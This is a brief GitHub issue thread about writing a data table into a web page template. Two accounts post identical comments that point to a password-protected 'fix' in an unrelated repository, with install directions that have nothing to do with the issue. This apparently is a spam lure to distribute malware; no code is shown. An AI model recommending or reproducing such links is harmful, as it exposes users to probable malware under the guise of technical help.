### ISSUE TITLE
Write data to web page template

### ISSUE THREAD

**Issue by christhornton555** [cjthornton78/clough#6]
Crack open a template file for a web page, and insert the data table into it

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by christhornton555** [comment]
Done. That was easier than expected. This works. We've got a working prototype, folks
